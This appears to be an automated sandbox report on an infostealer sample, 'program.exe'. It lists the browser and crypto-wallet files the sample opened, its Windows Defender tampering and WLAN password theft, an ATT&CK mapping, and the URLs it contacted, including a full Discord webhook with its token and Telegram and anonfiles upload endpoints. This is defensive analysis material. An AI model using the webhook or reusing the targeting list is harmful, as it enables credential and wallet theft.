              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Users\user\Desktop\program.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: Yara match | File source: 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: program.exe PID: 7324, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: 00000001.00000003.2102475831.000001B5FEEF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.2105351723.000001B5FDA10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1707785964.000002641A645000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1707785964.000002641A643000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: program.exe PID: 7308, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: program.exe PID: 7324, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\_MEI73082\rarreg.key, type: DROPPED
              Source: Yara match | File source: Process Memory Space: program.exe PID: 7324, type: MEMORYSTR
ATT&CK matrix (the techniques of each tactic column are listed per tactic; a number in front of a technique is the count badge shown in the report's matrix, kept as it appears):

• Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
• Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
• Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
• Execution: 241 Windows Management Instrumentation; 3 Native API; 122 Command and Scripting Interpreter; 3 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
• Persistence: 1 DLL Side-Loading; 2 Registry Run Keys / Startup Folder; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
• Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 11 Process Injection; 2 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
• Defense Evasion: 1 File and Directory Permissions Modification; 4 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 21 Obfuscated Files or Information; 11 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 Modify Registry; 141 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 11 Process Injection
• Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
• Discovery: 2 System Time Discovery; 3 File and Directory Discovery; 48 System Information Discovery; 151 Security Software Discovery; 2 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery; Network Service Discovery; System Network Connections Discovery
• Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
• Collection: 1 Archive Collected Data; 3 Data from Local System; 1 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
• Command and Control: 3 Ingress Tool Transfer; 21 Encrypted Channel; 4 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
• Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
• Impact: 1 Data Encrypted for Impact; 1 System Shutdown/Reboot; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph ID: 1557107 | Sample: program.exe | Start date: 17/11/2024 | Architecture: WINDOWS | Score: 100

The behavior graph, written out as a process tree (the numbers shown next to a process name in the graph are kept in brackets):

• Analysis root: DNS/IP: ip-api.com; discord.com. Signatures: Found malware configuration; Sigma detected: Capture Wi-Fi password; Multi AV Scanner detection for submitted file; 10 other signatures
  • program.exe [22] started. Dropped: C:\Users\user\AppData\Local\Temp\...\rar.exe (PE32+); C:\Users\user\AppData\Local\...\rarreg.key (ASCII); C:\Users\user\AppData\...\unicodedata.pyd (PE32+); 16 other files (none is malicious). Signatures: Modifies Windows Defender protection settings; Adds a directory exclusion to Windows Defender; Tries to harvest and steal WLAN passwords; Removes signatures from Windows Defender
    • program.exe [1 90] started. DNS/IP: ip-api.com 208.95.112.1, 49743, 80 TUT-ASUS United States; discord.com 162.159.137.232, 443, 49744 CLOUDFLARENETUS United States. Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal browser information (history, passwords, etc); Modifies Windows Defender protection settings; 6 other signatures
      • cmd.exe [1] started. Signatures: Suspicious powershell command line found; Uses cmd line tools excessively to alter registry or file data; Encrypted powershell cmdline option found; 2 other signatures
        • powershell.exe [23] started
        • conhost.exe started
      • cmd.exe [1] started. Signatures: Modifies Windows Defender protection settings; Removes signatures from Windows Defender
        • powershell.exe [23] started. Signature: Loading BitLocker PowerShell Module
        • 2 other processes
      • cmd.exe [1] started. Signature: Adds a directory exclusion to Windows Defender
        • powershell.exe started
        • conhost.exe started
      • 28 other processes. Signature: Tries to harvest and steal WLAN passwords
        • getmac.exe started. Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Writes or reads registry keys via WMI
        • systeminfo.exe started
        • 54 other processes. Dropped: C:\Users\user\AppData\...\tgmup5d5.cmdline (Unicode); C:\Users\user\AppData\Local\Temp\MBLSI.zip (RAR)
          • csc.exe started. Dropped: C:\Users\user\AppData\Local\...\tgmup5d5.dll (PE32)
            • cvtres.exe started

Source | Detection | Scanner | Label
program.exe | 45% | ReversingLabs | Win64.Trojan.Generic
program.exe | 47% | Virustotal |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\_MEI73082\VCRUNTIME140.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73082\VCRUNTIME140.dll | 0% | Virustotal |
C:\Users\user\AppData\Local\Temp\_MEI73082\_bz2.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73082\_bz2.pyd | 1% | Virustotal |
C:\Users\user\AppData\Local\Temp\_MEI73082\_ctypes.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73082\_decimal.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73082\_hashlib.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73082\_lzma.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73082\_queue.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73082\_socket.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73082\_sqlite3.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73082\_ssl.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73082\libcrypto-3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73082\libffi-8.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73082\libssl-3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73082\python313.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73082\select.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73082\sqlite3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73082\unicodedata.pyd | 0% | ReversingLabs |
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label
http://schemas.mic; | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
discord.com | 162.159.137.232 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://discord.com/api/webhooks/1298867906041479188/X0YmXSYYuFGsCIlZL1CQlv_GeIoIWc3S1cksX7_7_e4Onj-TjaVqNzNpf_yEZ3AJvNBM | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/Blank-c/BlankOBF | program.exe, 00000001.00000003.1720139515.000001B5FE45D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1724687478.000001B5FE13E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1721395579.000001B5FE107000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/urllib3/urllib3/issues/29200 | program.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://www.avito.ru/ | program.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py# | program.exe, 00000001.00000002.2104884154.000001B5FC007000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.leboncoin.fr/ | program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file | program.exe, 00000001.00000002.2105991946.000001B5FE050000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://tools.ietf.org/html/rfc2388#section-4.4 | program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64 | program.exe, 00000001.00000003.1713530178.000001B5FDD14000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1718315279.000001B5FDD08000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1713899896.000001B5FDD14000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1714242309.000001B5FDD18000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1718558053.000001B5FDD11000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1725898997.000001B5FDD18000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1714439286.000001B5FDD18000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1727743647.000001B5FDCB7000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1723691817.000001B5FDD15000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://weibo.com/ | program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000001.00000002.2107834839.000001B5FE95C000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000001.00000002.2107834839.000001B5FE980000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://api.anonfiles.com/upload | program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://packaging.python.org/en/latest/specifications/entry-points/#file-format | program.exe, 00000001.00000002.2105991946.000001B5FE050000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.msn.com | program.exe, 00000001.00000002.2114614682.000001B5FFA8C000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000008.00000002.1906355908.000001A84B996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1981454462.000001E9C1FA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908908412.000001E9B374D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1981454462.000001E9C1E5D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://discord.com/api/v9/users/ | program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963 | program.exe, 00000001.00000002.2107071806.000001B5FE450000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://cacerts.digi | program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://peps.python.org/pep-0205/ | program.exe, 00000001.00000003.1711208827.000001B5FDA11000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://www.reddit.com/ | program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000008.00000002.1871103876.000001A83B921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908908412.000001E9B1DE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename | program.exe, 00000001.00000002.2105086608.000001B5FD810000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy | program.exe, 00000001.00000002.2107318473.000001B5FE680000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688 | program.exe, 00000001.00000002.2105086608.000001B5FD894000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000002A.00000002.1908908412.000001E9B36F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1991968097.000001E9CA1A0000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000008.00000002.1871103876.000001A83BB49000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ebay.de/ | program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000002A.00000002.1908908412.000001E9B36F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1991968097.000001E9CA1A0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code | program.exe, 00000001.00000002.2105086608.000001B5FD810000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 0000002A.00000002.1908908412.000001E9B2CB9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader | program.exe, 00000001.00000002.2104884154.000001B5FC007000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.amazon.com/ | program.exe, 00000001.00000002.2107834839.000001B5FE8B0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://github.com/python/cpython/issues/86361. | program.exe, 00000001.00000003.1727613686.000001B5FDCC1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1727759704.000001B5FDD25000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105991946.000001B5FE050000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 0000002A.00000002.1981454462.000001E9C1E5D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://httpbin.org/ | program.exe, 00000001.00000003.1784927173.000001B5FE3BD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module | program.exe, 00000001.00000002.2105086608.000001B5FD810000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000001.00000003.2000044221.000001B5FF37B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2000411427.000001B5FF22F000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2104205317.000001B5FE394000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2104116645.000001B5FE382000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches | program.exe, 00000001.00000002.2105086608.000001B5FD810000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | program.exe, 00000001.00000003.1759907670.000001B5FE389000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1759251928.000001B5FE3FB000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1799365735.000001B5FE388000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1797522496.000001B5FE3EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1754035626.000001B5FE3FB000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1784927173.000001B5FE36D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://allegro.pl/ | program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000002A.00000002.1908908412.000001E9B36F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1991968097.000001E9CA1A0000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535 | program.exe, 00000001.00000002.2105991946.000001B5FE212000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103489320.000001B5FE212000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105351723.000001B5FDA10000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy | program.exe, 00000001.00000002.2104884154.000001B5FC007000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://MD8.mozilla.org/1/m | program.exe, 00000001.00000002.2110707812.000001B5FF148000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2107834839.000001B5FE980000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata | program.exe, 00000001.00000003.1784927173.000001B5FE301000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2107318473.000001B5FE680000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://www.bbc.co.uk/ | program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://bugzilla.mo | program.exe, 00000001.00000002.2107834839.000001B5FE980000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://github.com/python/importlib_metadata/wiki/Development-Methodology | program.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://tools.ietf.org/html/rfc6125#section-6.4.3 | program.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000008.00000002.1871103876.000001A83BB49000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://google.com/mail | program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105467796.000001B5FDCC2000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://packaging.python.org/specifications/entry-points/ | program.exe, 00000001.00000003.1784927173.000001B5FE301000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2107200618.000001B5FE560000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmp | false | | high
